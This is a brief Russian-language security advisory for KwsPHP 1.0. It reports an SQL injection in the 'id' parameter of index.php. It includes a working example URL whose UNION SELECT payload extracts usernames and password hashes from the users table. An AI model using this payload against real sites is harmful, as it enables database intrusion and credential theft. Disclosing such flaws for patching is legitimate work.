Программа: KwsPHP 1.0

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

http://server.com/Path/index.php?mod=sondages&do=results&id= -1%20union%20select%201,2,3,concat(pseudo,0x3a,pass), 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 %20from%20users%20where%20id=1—



Оставить мнение